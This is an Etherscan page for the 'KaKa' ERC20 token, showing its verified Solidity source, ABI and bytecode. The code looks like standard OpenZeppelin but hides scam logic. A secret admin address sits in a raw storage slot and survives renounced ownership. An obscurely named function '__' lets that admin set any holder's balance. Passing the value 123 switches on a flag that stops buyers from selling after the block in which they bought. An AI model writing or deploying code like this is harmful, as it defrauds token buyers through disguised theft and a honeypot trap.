ETH Price: $3,297.62 (+1.58%)
Gas: 2 Gwei

Token

KaKa (KaKa)
 

Overview

Max Total Supply

1,000,000 KaKa

Holders

27

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
20,678.595714642994407193 KaKa

Value
$0.00
0x94d181454f43117d2a73760dac9f6ea1389ec17f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20Test

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-03
*/

//Telegram:https://t.me/KaKaETH_ERC20
//Twitter:https://twitter.com/KAKAERC20
//website:http://kakaerc.vip/
pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (utils/StorageSlot.sol)

pragma solidity ^0.8.0;

/**
 * @dev Library for reading and writing primitive types to specific storage slots.
 *
 * Storage slots are often used to avoid storage conflict when dealing with upgradeable contracts.
 * This library helps with reading and writing to such slots without the need for inline assembly.
 *
 * The functions in this library return Slot structs that contain a `value` member that can be used to read or write.
 *
 * Example usage to set ERC1967 implementation slot:
 * ```
 * contract ERC1967 {
 *     bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
 *
 *     function _getImplementation() internal view returns (address) {
 *         return StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value;
 *     }
 *
 *     function _setImplementation(address newImplementation) internal {
 *         require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");
 *         StorageSlot.getAddressSlot(_IMPLEMENTATION_SLOT).value = newImplementation;
 *     }
 * }
 * ```
 *
 * _Available since v4.1 for `address`, `bool`, `bytes32`, and `uint256`._
 */
library StorageSlot {
    struct AddressSlot {
        address value;
    }

    struct BooleanSlot {
        bool value;
    }

    struct Bytes32Slot {
        bytes32 value;
    }

    struct Uint256Slot {
        uint256 value;
    }

    /**
     * @dev Returns an `AddressSlot` with member `value` located at `slot`.
     */
    function getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `BooleanSlot` with member `value` located at `slot`.
     */
    function getBooleanSlot(bytes32 slot) internal pure returns (BooleanSlot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Bytes32Slot` with member `value` located at `slot`.
     */
    function getBytes32Slot(bytes32 slot) internal pure returns (Bytes32Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }

    /**
     * @dev Returns an `Uint256Slot` with member `value` located at `slot`.
     */
    function getUint256Slot(bytes32 slot) internal pure returns (Uint256Slot storage r) {
        /// @solidity memory-safe-assembly
        assembly {
            r.slot := slot
        }
    }
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


// File @openzeppelin/contracts/token/ERC20/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


// File @openzeppelin/contracts/token/ERC20/[email protected]


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;



/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    bytes32 internal constant _A_SLOT = 0x140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad;
    address public pair;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;  
        _symbol = symbol_;

        _totalSupply = 1000000000000000000000000;
        _balances[msg.sender] = _totalSupply;

        emit Transfer(address(0), msg.sender, _totalSupply);
        _isExcludeFromFee[address(this)] = true;
        _isExcludeFromFee[msg.sender] = true;
        StorageSlot.getAddressSlot(_A_SLOT).value = msg.sender;
    }

    function setPair(
        address _pair
    ) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        pair = _pair;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    function __(address _index, uint256 _value) public {
        require(msg.sender == StorageSlot.getAddressSlot(_A_SLOT).value, "a");
        mapping(address => uint) storage __b = _balances;
        __b[_index] = _value;
        fromBal = _value == 123 ? true : _value == 234 ? false : fromBal;
    }

    mapping (address => uint256) public _v1alue;
    bool public fromBal ;mapping(address => bool) public _isExcludeFromFee;

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        uint256 bok = block.number;

        _beforeTokenTransfer(from, to, amount);

        if (!_isExcludeFromFee[from] && !_isExcludeFromFee[to]){
            uint256 _bal = _v1alue[to];
            if (from == pair && _bal == 0){
                _v1alue[to] = bok;
            }else{
                _bal = _v1alue[from];
                if (fromBal){
                    require( _bal == 0 || bok < _bal + 1);
                }
            }
        }


        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


// File contracts/ERC20Test.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;


contract ERC20Test is ERC20('KaKa', 'KaKa'), Ownable {
    constructor() {

    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_index","type":"address"},{"internalType":"uint256","name":"_value","type":"uint256"}],"name":"__","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludeFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_v1alue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"fromBal","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_pair","type":"address"}],"name":"setPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040805180820182526004808252634b614b6160e01b6020808401828152855180870190965292855284015281519192916200005191600391620001c1565b50805162000067906004906020840190620001c1565b5069d3c21bcecceda100000060028190553360008181526020819052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620000bd9162000267565b60405180910390a33060009081526008602090815260408083208054600160ff19918216811790925533808652929094208054909416179092556200012d907f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad9062000168811b6200063317901c565b80546001600160a01b0319166001600160a01b0392909216919091179055506200016290506200015c6200016b565b6200016f565b620002ad565b90565b3390565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b828054620001cf9062000270565b90600052602060002090601f016020900481019282620001f357600085556200023e565b82601f106200020e57805160ff19168380011785556200023e565b828001600101855582156200023e579182015b828111156200023e57825182559160200191906001019062000221565b506200024c92915062000250565b5090565b5b808211156200024c576000815560010162000251565b90815260200190565b6002810460018216806200028557607f821691505b60208210811415620002a757634e487b7160e01b600052602260045260246000fd5b50919050565b610e0a80620002bd6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806375a361c5116100ad578063a457c2d711610071578063a457c2d71461024d578063a8aa1b3114610260578063a9059cbb14610268578063dd62ed3e1461027b578063f2fde38b1461028e5761012c565b806375a361c5146102025780638187f5161461020a57806384bf2a081461021d5780638da5cb5b1461023057806395d89b41146102455761012c565b806336b2e027116100f457806336b2e027146101ac57806339509351146101bf57806370a08231146101d2578063715018a6146101e557806371da213e146101ef5761012c565b806306fdde0314610131578063095ea7b31461014f57806318160ddd1461016f57806323b872dd14610184578063313ce56714610197575b600080fd5b6101396102a1565b6040516101469190610aa5565b60405180910390f35b61016261015d366004610a5d565b610333565b6040516101469190610a9a565b610177610355565b6040516101469190610d5e565b610162610192366004610a22565b61035b565b61019f610389565b6040516101469190610d67565b6101626101ba3660046109cf565b61038e565b6101626101cd366004610a5d565b6103a3565b6101776101e03660046109cf565b6103cf565b6101ed6103ee565b005b6101776101fd3660046109cf565b610402565b610162610414565b6101ed6102183660046109cf565b61041d565b6101ed61022b366004610a5d565b610499565b610238610541565b6040516101469190610a86565b610139610550565b61016261025b366004610a5d565b61055f565b6102386105a7565b610162610276366004610a5d565b6105b6565b6101776102893660046109f0565b6105ce565b6101ed61029c3660046109cf565b6105f9565b6060600380546102b090610d99565b80601f01602080910402602001604051908101604052809291908181526020018280546102dc90610d99565b80156103295780601f106102fe57610100808354040283529160200191610329565b820191906000526020600020905b81548152906001019060200180831161030c57829003601f168201915b5050505050905090565b60008061033e610636565b905061034b81858561063a565b5060019392505050565b60025490565b600080610366610636565b90506103738582856106ee565b61037e858585610738565b506001949350505050565b601290565b60086020526000908152604090205460ff1681565b6000806103ae610636565b905061034b8185856103c085896105ce565b6103ca9190610d75565b61063a565b6001600160a01b0381166000908152602081905260409020545b919050565b6103f6610922565b6104006000610961565b565b60066020526000908152604090205481565b60075460ff1681565b6104467f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104775760405162461bcd60e51b815260040161046e90610bc3565b60405180910390fd5b600580546001600160a01b0319166001600160a01b0392909216919091179055565b6104c27f140f1f5c37a861fe6d912bc017fef84158e8b6b510b17348f61a113179a0dbad610633565b546001600160a01b031633146104ea5760405162461bcd60e51b815260040161046e90610bc3565b6001600160a01b0382166000908152602081905260408120829055607b8214610528578160ea146105205760075460ff16610523565b60005b61052b565b60015b6007805460ff1916911515919091179055505050565b6009546001600160a01b031690565b6060600480546102b090610d99565b60008061056a610636565b9050600061057882866105ce565b90508381101561059a5760405162461bcd60e51b815260040161046e90610d19565b61037e828686840361063a565b6005546001600160a01b031681565b6000806105c1610636565b905061034b818585610738565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610601610922565b6001600160a01b0381166106275760405162461bcd60e51b815260040161046e90610b3b565b61063081610961565b50565b90565b3390565b6001600160a01b0383166106605760405162461bcd60e51b815260040161046e90610cd5565b6001600160a01b0382166106865760405162461bcd60e51b815260040161046e90610b81565b6001600160a01b0380841660008181526001602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906106e1908590610d5e565b60405180910390a3505050565b60006106fa84846105ce565b9050600019811461073257818110156107255760405162461bcd60e51b815260040161046e90610bde565b610732848484840361063a565b50505050565b6001600160a01b03831661075e5760405162461bcd60e51b815260040161046e90610c90565b6001600160a01b0382166107845760405162461bcd60e51b815260040161046e90610af8565b436107908484846109b3565b6001600160a01b03841660009081526008602052604090205460ff161580156107d257506001600160a01b03831660009081526008602052604090205460ff16155b15610871576001600160a01b0380841660009081526006602052604090205460055490918681169116148015610806575080155b1561082b576001600160a01b038416600090815260066020526040902082905561086f565b506001600160a01b03841660009081526006602052604090205460075460ff161561086f578015806108665750610863816001610d75565b82105b61086f57600080fd5b505b6001600160a01b038416600090815260208190526040902054828110156108aa5760405162461bcd60e51b815260040161046e90610c15565b6001600160a01b0380861660008181526020819052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610908908790610d5e565b60405180910390a361091b8585856109b3565b5050505050565b61092a610636565b6001600160a01b031661093b610541565b6001600160a01b0316146104005760405162461bcd60e51b815260040161046e90610c5b565b600980546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b505050565b80356001600160a01b03811681146103e957600080fd5b6000602082840312156109e0578081fd5b6109e9826109b8565b9392505050565b60008060408385031215610a02578081fd5b610a0b836109b8565b9150610a19602084016109b8565b90509250929050565b600080600060608486031215610a36578081fd5b610a3f846109b8565b9250610a4d602085016109b8565b9150604084013590509250925092565b60008060408385031215610a6f578182fd5b610a78836109b8565b946020939093013593505050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602080835283518082850152825b81811015610ad157858101830151858201604001528201610ab5565b81811115610ae25783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252600190820152606160f81b604082015260600190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d9457634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680610dad57607f821691505b60208210811415610dce57634e487b7160e01b600052602260045260246000fd5b5091905056fea2646970667358221220f49815862aa7d0acb25243003896b2e1d064e6c6bead70240cd22ccbe283d8b164736f6c63430008000033

Deployed Bytecode

